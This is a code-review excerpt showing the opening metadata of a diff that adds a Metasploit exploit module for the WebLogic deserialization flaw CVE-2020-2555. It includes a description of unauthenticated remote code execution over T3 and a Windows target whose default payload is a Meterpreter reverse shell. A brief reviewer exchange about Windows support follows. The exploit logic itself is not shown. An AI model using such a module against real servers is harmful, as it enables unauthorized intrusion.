modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb

```diff
@@ -0,0 +1,771 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+  include Exploit::CmdStager
+  include Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Weblogic Deserialize BadAttributeValueExpException',
+      'Description'    => %q(
+        There exists an object deserialization vulnerability
+        in multiple versions of WebLogic.
+
+        Unauthenticated remote code execution can be achieved
+        by sending a serialized BadAttributeValueExpException object
+        over T3 to vulnerable WebLogic servers.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Jang',       # Vuln Discovery
+        'Y4er',       # PoC
+        'Shelby Pace' # Metasploit Module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2020-2555' ],
+          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
+          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
+        ],
+      'Platform'       => %w{ unix linux win },
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ],
+              'DefaultOptions'  => { 'Payload' =>  'windows/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix',
+            {
+              'Platform'        => %w{ unix linux },
+              'CmdStagerFlavor' => 'printf',
```

Comment:
I don't think this will work on Windows?

Reply:
How does this section relate to Windows?

Reply:
My bad. I misread it.